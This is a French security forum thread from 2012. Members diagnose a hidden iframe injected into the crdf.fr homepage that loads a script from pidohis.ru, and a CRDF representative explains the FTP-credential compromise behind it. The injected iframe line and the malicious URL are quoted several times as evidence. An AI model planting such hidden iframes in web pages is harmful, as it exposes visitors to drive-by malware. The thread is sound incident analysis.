Aller au contenu


Crdf.fr Infecté ?

exploit java crdf hacking pidohis.ru infection

  • Vous ne pouvez pas répondre à ce sujet
26 replies to this topic

#1 le barbier fou

le barbier fou

    Serrurier fou !

  • Modérateur
  • PipPipPipPipPipPip
  • 470 Messages :
  • Gender:Male
  • Location:Nulle-Part-sur Mer

Posté 17 avril 2012 - 21:52

Salut !

Je viens de remarquer que plusieurs sous-domaines de crdf.fr (dont threatcenter.crdf.fr) sont inaccessibles.
La page d'accueil du site, elle, ne semble pas être en odeur de sainteté auprès de Chromium :

Image IPB

La page contient en fait un iframe appelant un script PHP hébergé chez pidohis.ru... :keskidit:
Ce qui a pour effet d'exécuter un applet Java...
Ça ne sent pas bon, et ça ne vient pas de mes aisselles. A priori.

Quelqu'un a des infos ?

Bonne soirée à tous ! ;)
250635.jpg

#2 vigen

vigen

    Hardcore Papa

  • Tonton Flingueur
  • PipPipPipPipPipPipPipPipPip
  • 6 545 Messages :
  • Gender:Male
  • Location:Normandie

Posté 17 avril 2012 - 22:01

Salut Barbier comment va??? ;)

Ecoute je n'arrive plus a acceder au "ThreatCenter", il y'avais un message "d'accueil" spécifiant leur retour le 19/04.

J'ai papoter avec Saachaa qui est hébergé chez eux (crdf.net)

C'est la deuxième fois en peu de temps que leur serveurs sont inacessibles.

Pour moi CRDF.fr y'a pas de soucis ni d'applet java ce lançant (je viens d'essayer)!!! :) (Firefox)

Ce message a été modifié par vigen - 17 avril 2012 - 22:02 .


#3 manzai

manzai

    Manzailleur

  • Zimien
  • PipPipPipPipPipPipPipPipPip
  • 2 521 Messages :
  • Gender:Male
  • Location:Molsheim (Alsace)

Posté 17 avril 2012 - 22:12

Le site de crdf.fr n'as pas de soucis :)

Le ThreatCenter & le site de Saachaa sont innacessible.

VirusTotal dit rien d'anormal pourtant : https://www.virustot...sis/1334697076/ et https://www.virustot...sis/1334697236/

Ce message a été modifié par manzai - 17 avril 2012 - 22:14 .

J'ai : Un PC, un navigateur, un av et un fai, ça te va ?!

#4 le barbier fou

le barbier fou

    Serrurier fou !

  • Modérateur
  • PipPipPipPipPipPip
  • 470 Messages :
  • Gender:Male
  • Location:Nulle-Part-sur Mer

Posté 17 avril 2012 - 22:24

Salut Barbier comment va??? ;)

Plutôt bien, merci. :)

Quoique, d'après ce que vous me dites, le soucis viendrait de chez moi. ^^ C'est dérangeant.
Avez-vous cette ligne dans le code source de la page ? :
<iframe src="http://pidohis.ru/count13.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px; " width="10" height="10"></iframe>

Ce message a été modifié par le barbier fou - 17 avril 2012 - 22:24 .

250635.jpg

#5 vigen

vigen

    Hardcore Papa

  • Tonton Flingueur
  • PipPipPipPipPipPipPipPipPip
  • 6 545 Messages :
  • Gender:Male
  • Location:Normandie

Posté 17 avril 2012 - 22:24

Chez Anubis, pour crdf.fr:

http://anubis.isecla...e28&format=html

#6 le barbier fou

le barbier fou

    Serrurier fou !

  • Modérateur
  • PipPipPipPipPipPip
  • 470 Messages :
  • Gender:Male
  • Location:Nulle-Part-sur Mer

Posté 17 avril 2012 - 22:31

Le rapport Anubis le confirme, il y a bien une requête vers pidohis.ru (qui n'a rien à faire là). Peut-être n'aboutit-elle pas, vu que le chargement se termine par un timeout.

Ce message a été modifié par le barbier fou - 17 avril 2012 - 22:31 .

250635.jpg

#7 vigen

vigen

    Hardcore Papa

  • Tonton Flingueur
  • PipPipPipPipPipPipPipPipPip
  • 6 545 Messages :
  • Gender:Male
  • Location:Normandie

Posté 17 avril 2012 - 22:38

Le rapport Anubis le confirme, il y a bien une requête vers pidohis.ru (qui n'a rien à faire là). Peut-être n'aboutit-elle pas, vu que le chargement se termine par un timeout.



Oui j'ai bien aussi la requete, (Firefox, firebug comme éditeur) :

"<iframe width="10" height="10" src="http://pidohis.ru/count13.php" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;"></iframe>
<html xmlns="http://www.w3.org/1999/xhtml" class="blacklist">
<head>
<link rel="stylesheet" href="chrome://global/skin/netError.css" type="text/css" media="all"/>
<link rel="icon" type="image/png" id="favicon" href="chrome://global/skin/icons/blacklist_favicon.png"/>

Ce message a été modifié par vigen - 17 avril 2012 - 22:44 .


#8 le barbier fou

le barbier fou

    Serrurier fou !

  • Modérateur
  • PipPipPipPipPipPip
  • 470 Messages :
  • Gender:Male
  • Location:Nulle-Part-sur Mer

Posté 17 avril 2012 - 22:41

Oui.
250635.jpg

#9 vigen

vigen

    Hardcore Papa

  • Tonton Flingueur
  • PipPipPipPipPipPipPipPipPip
  • 6 545 Messages :
  • Gender:Male
  • Location:Normandie

Posté 17 avril 2012 - 22:48

Oui.


Ce devait etre la réponse pour Adblock, mais j'ai édité entre temps vu que j'ai trouver la ligne dans le code de la page !!! :D

#10 le barbier fou

le barbier fou

    Serrurier fou !

  • Modérateur
  • PipPipPipPipPipPip
  • 470 Messages :
  • Gender:Male
  • Location:Nulle-Part-sur Mer

Posté 17 avril 2012 - 22:52

Oui.

Oui.


Ce devait etre la réponse pour Adblock, mais j'ai édité entre temps vu que j'ai trouver la ligne dans le code de la page !!! :D


Oui. :D
250635.jpg

#11 vigen

vigen

    Hardcore Papa

  • Tonton Flingueur
  • PipPipPipPipPipPipPipPipPip
  • 6 545 Messages :
  • Gender:Male
  • Location:Normandie

Posté 17 avril 2012 - 23:05

En tous cas bien vu l'aveugle !!!! :D

Pour Firefox tous vas bien ^^ (pour crdf.fr)

Si l'on va sur: http://pidohis.ru/count13.php la page "malveillante", Firefox la bloque ainsi que WOT.

En fouinant un peu on trouve ça:

http://jsunpack.jeek...e52be5ff21080a0

Bref, je te confirme Barbier ce n'était pas tes aisselles !!! :D

Ce message a été modifié par vigen - 17 avril 2012 - 23:26 .


#12 le barbier fou

le barbier fou

    Serrurier fou !

  • Modérateur
  • PipPipPipPipPipPip
  • 470 Messages :
  • Gender:Male
  • Location:Nulle-Part-sur Mer

Posté 18 avril 2012 - 00:35

Ouf ! :transpi:

CRDF sont au courant de ça ?
Le site pidohis.ru est à fuir, c'est certain. Il est néanmoins difficile de deviner ce que fait exactement le javascript - puisqu'apparemment c'en est un. Je n'ai plus d'applet Java qui se lance, la requête vers pidohis ne semble plus aboutir (timeout).
250635.jpg

#13 vigen

vigen

    Hardcore Papa

  • Tonton Flingueur
  • PipPipPipPipPipPipPipPipPip
  • 6 545 Messages :
  • Gender:Male
  • Location:Normandie

Posté 18 avril 2012 - 01:04

Je pense qu'ils doivent l'etre...Vu leurs soucis....Simple supposition en meme temps ^^


Un ptit edit a 03h20 du mat :D

J'ai tenter avec opéra, java a tenter de se connecter, alerte de connection du pare-feu de DrWeb :D Heureusement qu'il est pas automatique celui là !!! :transpi:

Ce message a été modifié par vigen - 18 avril 2012 - 02:22 .


#14 noisette

noisette

    Webmarster

  • Admin
  • PipPipPipPipPipPipPipPipPip
  • 21 797 Messages :
  • Gender:Male

Posté 18 avril 2012 - 07:54

Désolé de dire ça, mais ces hébergeurs de taille "modeste", ils sont sympas, ils sont attendrissants, mais faut éviter, juste éviter.

#15 vigen

vigen

    Hardcore Papa

  • Tonton Flingueur
  • PipPipPipPipPipPipPipPipPip
  • 6 545 Messages :
  • Gender:Male
  • Location:Normandie

Posté 18 avril 2012 - 09:42

L'adresse: http://pidohis.ru/count13.php génére un blocage de Spidergate depuis ce matin !!!! :) (Et donc quand l'on se rend chez CRDF le script est bloqué!!)

Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.

Ce message a été modifié par vigen - 18 avril 2012 - 09:45 .


#16 loumax

loumax

    YodaMars

  • Administrateur
  • PipPipPipPipPipPipPipPipPip
  • 3 646 Messages :
  • Gender:Male

Posté 18 avril 2012 - 10:26

L'adresse: http://pidohis.ru/count13.php génére un blocage de Spidergate depuis ce matin !!!! :) (Et donc quand l'on se rend chez CRDF le script est bloqué!!)

Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.


Si si :)

Fichier joint  blocking.PNG   38,47 Ko   6 Nombre de téléchargements 

http://pidohis.ru/count13.php


"Celui qui aime à apprendre est bien près du savoir" (Confucius)

________________________________________________


#17 vigen

vigen

    Hardcore Papa

  • Tonton Flingueur
  • PipPipPipPipPipPipPipPipPip
  • 6 545 Messages :
  • Gender:Male
  • Location:Normandie

Posté 18 avril 2012 - 10:28

Oui quand on va directement sur le lien :)

J'en parlé "ce matin" avec Le Barbier, mais quand tu va sur la page CRDF.fr rien.....Alors qu'en éditant avec Dragonfly, l'Iframe découvert par Le Barbier est bien toujours présent.

Ce message a été modifié par vigen - 18 avril 2012 - 10:29 .


#18 loumax

loumax

    YodaMars

  • Administrateur
  • PipPipPipPipPipPipPipPipPip
  • 3 646 Messages :
  • Gender:Male

Posté 18 avril 2012 - 10:32

Ok ;)


"Celui qui aime à apprendre est bien près du savoir" (Confucius)

________________________________________________


#19 vigen

vigen

    Hardcore Papa

  • Tonton Flingueur
  • PipPipPipPipPipPipPipPipPip
  • 6 545 Messages :
  • Gender:Male
  • Location:Normandie

Posté 18 avril 2012 - 10:34

Ok ;)


Désolé de m'etre mal exprimé !!!! :XZombi:

#20 ractamard

ractamard

    Touriste Martien

  • Zimien
  • PipPipPipPipPip
  • 213 Messages :
  • Gender:Male

Posté 18 avril 2012 - 16:48

Le site de crdf.fr n'as pas de soucis :)

Le ThreatCenter & le site de Saachaa sont innacessible.


Pour le site de Saachaa, il a changer d'addresse : http://www.security-helpzone.com/
Image IPB

#21 manzai

manzai

    Manzailleur

  • Zimien
  • PipPipPipPipPipPipPipPipPip
  • 2 521 Messages :
  • Gender:Male
  • Location:Molsheim (Alsace)

Posté 18 avril 2012 - 17:13

Le site de crdf.fr n'as pas de soucis :)

Le ThreatCenter & le site de Saachaa sont innacessible.


Pour le site de Saachaa, il a changer d'addresse : http://www.security-helpzone.com/


Merci pour le lien :)
J'ai : Un PC, un navigateur, un av et un fai, ça te va ?!

#22 le barbier fou

le barbier fou

    Serrurier fou !

  • Modérateur
  • PipPipPipPipPipPip
  • 470 Messages :
  • Gender:Male
  • Location:Nulle-Part-sur Mer

Posté 19 avril 2012 - 01:18

L'iframe indésirable n'est plus. Disparu aussi innocemment qu'il était venu.

Deux enseignements, au moins, peuvent en être tirés :

Sur ce coup là, l'api de google a bien fait son boulot, car sous Firefox ou Opéra, pas d'alerte du navigateur.


et surtout :

Désolé de dire ça, mais ces hébergeurs de taille "modeste", ils sont sympas, ils sont attendrissants, mais faut éviter, juste éviter.


250635.jpg

#23 noisette

noisette

    Webmarster

  • Admin
  • PipPipPipPipPipPipPipPipPip
  • 21 797 Messages :
  • Gender:Male

Posté 19 avril 2012 - 06:09

Quand on imagine les loustics qu'on peut trouver sur le net, c'est clair que techniquement, personne n'est à l'abri, mais d'avoir un hébergeur possédant de gros ressorts techniques en sécurité, même si ce n'est pas imparable, c'est déjà ça.

Je suis un peu vert de devoir le dire, mon naturel me faisant plutôt pencher pour les petites structures, les petites équipes, voire les activités individuelles, mais pour un hébergement, c'est chaud.

#24 crdffrance

crdffrance

    Touriste Deimosien

  • Zimien
  • PipPipPip
  • 35 Messages :

Posté 22 avril 2012 - 11:02

Bonjour à tous,

Tout d'abord, je tiens à vous remercier de l'intérêt que vous portez aux services de CRDF France et à ses produits. Nous avons rencontré quelques difficultées en ce moment à la suite d'une fuite d'information par un virus via une clé USB connectée sur notre réseau qui contenait un Trojan-Downloader.Win32. Seul le domaine "crdf.fr" et son serveur a été touché (hébergement mutualisé OVH) par cette attaque. L'auteur de cette attaque malveillante n'avait que pour but de générer du gain et celui-ci n'a exploité aucune faille de nos serveurs, il avait tout simplement le mot de passe d'un de nos serveurs FTP.

Le problème a été définitivement réglé. Nous déplaçons actuellement nos serveurs vers une autre infrastructure chez un hébergeur concurent. Notre priorité était donc de rétablir nos clients et non les sites Web à faible audience (c.f securityhelpzone).

> Désolé de dire ça, mais ces hébergeurs de taille "modeste", ils sont sympas, ils sont attendrissants, mais faut éviter, juste éviter.

Je tiens à dire que le serveur qui a été "piraté" (c'est un bien grand mot) est un serveur mutualisé OVH. Pour preuve, personne n'est à l'abri d'une faille de sécurité, d'un virus informatique ou d'un vol de données. C'est le risque à prendre sur internet. De plus, il n'y pas eu d'exploitation de failles sur l'une de nos applications.

Moralité : nous renforçons encore une fois la sécurité sur toutes nos infrastructures.

Cordialement,
Patrick,

Ce message a été modifié par crdffrance - 22 avril 2012 - 11:03 .


#25 noisette

noisette

    Webmarster

  • Admin
  • PipPipPipPipPipPipPipPipPip
  • 21 797 Messages :
  • Gender:Male

Posté 22 avril 2012 - 11:25

Bonjour Patrick,

bon, je comprends ton point de vue, et ta réaction, mais enfin: piraté, cela reste le mot, d'après ce que tu décris. Votre réseau est une infrastructure (logicielle) sous votre responsabilité, j'imagine, et non fournie par OVH, qui héberge. Dis-moi si je me trompe, mais je n'ai pas connaissance qu'OVH offre la prestation complète que tu décris. Et le service que vous rendez, c'est bien du cloud, donc un hébergement. Et c'est là qu'il y a eu faille.


A mon sens, la sécurisation des hébergements n'est jamais sûre à 100%, même chez OVH. J'en ai parfaitement conscience. Mais à ma connaissance, la plupart des piratages résultent de failles laissées non par eux, mais par les hébergés.

Je suis persuadé que sur le sujet de la sécurisation des hébergements, plus il y a de compétences, mieux c'est, et en ce sens, sur un sujet comme la sécurisation plus que dans d'autres, c'est à la faveur de ceux qui peuvent se payer et mettre en œuvre ces compétences.

Je n'ai pas dit que c'est conforme à ma "philosophie", mais je constate que seuls les gros ou presque arrivent à suivre sur ce sujet.

Bon, il y a des exceptions en tout, et mon intention n'est pas de te froisser, ni toi ni ton équipe. Je dis juste, chacun son taf. Votre action est tournée vers autre chose, de très louable au passage (je vous connais surtout par threatcenter - le cloud, je ne suis pas hyper chaud), ce n'est pas sans rapport, mais c'est autre chose, et l'essentiel, c'est que vous soyez bon dans votre domaine. ;)

Je conclue tout de même en rappelant que ça nous est arrivé aussi, chez ovh aussi, mais il semble, après quelques investigations, que la faute était notre. Un truc pas à jour.

#26 crdffrance

crdffrance

    Touriste Deimosien

  • Zimien
  • PipPipPip
  • 35 Messages :

Posté 22 avril 2012 - 12:18

> bon, je comprends ton point de vue, et ta réaction, mais enfin: piraté, cela reste le mot, d'après ce que tu décris. Votre réseau est une infrastructure (logicielle) sous votre responsabilité, j'imagine, et non fournie par OVH, qui héberge. Dis-moi si je me trompe, mais je n'ai pas connaissance qu'OVH offre la prestation complète que tu décris. Et le service que vous rendez, c'est bien du cloud, donc un hébergement. Et c'est là qu'il y a eu faille.

Les serveurs de CRDF Cloud n'ont pas été touchés, c'est d'ailleurs pour ça que j'ai bien précisé (crdf.fr). Notre site Web portail est hébergé sur un serveur mutualisé. Je tiens à préciser que les serveurs de CRDF Cloud sont très sécurisés.

> A mon sens, la sécurisation des hébergements n'est jamais sûre à 100%, même chez OVH. J'en ai parfaitement conscience. Mais à ma connaissance, la plupart des piratages résultent de failles laissées non par eux, mais par les hébergés.

En effet. Il y a des failles partout.

> Bon, il y a des exceptions en tout, et mon intention n'est pas de te froisser, ni toi ni ton équipe. Je dis juste, chacun son taf. Votre action est tournée vers autre chose, de très louable au passage (je vous connais surtout par threatcenter - le cloud, je ne suis pas hyper chaud), ce n'est pas sans rapport, mais c'est autre chose, et l'essentiel, c'est que vous soyez bon dans votre domaine. ;)

Je te remercie. Nous essayons d'être efficace.

Je pense que vous avons réagis très rapidement à ce problème sur notre site Internet. Tout est réglé et sécurisé.

Si vous avez d'éventuelles questions, merci de nous contacter à clients@crdf.fr.

Cordialement,
Patrick,

Ce message a été modifié par crdffrance - 22 avril 2012 - 13:34 .


#27 manzai

manzai

    Manzailleur

  • Zimien
  • PipPipPipPipPipPipPipPipPip
  • 2 521 Messages :
  • Gender:Male
  • Location:Molsheim (Alsace)

Posté 22 avril 2012 - 13:30

Bonjour CRDF France,

Je voudrais savoir si votre site a l'adresse http://threatcenter.crdf.fr/ a été corrigé? :)

Merci pour votre réponse ;)
J'ai : Un PC, un navigateur, un av et un fai, ça te va ?!



0 utilisateur(s) en train de lire ce sujet

0 membre(s), 0 invité(s), 0 utilisateur(s) anonyme(s)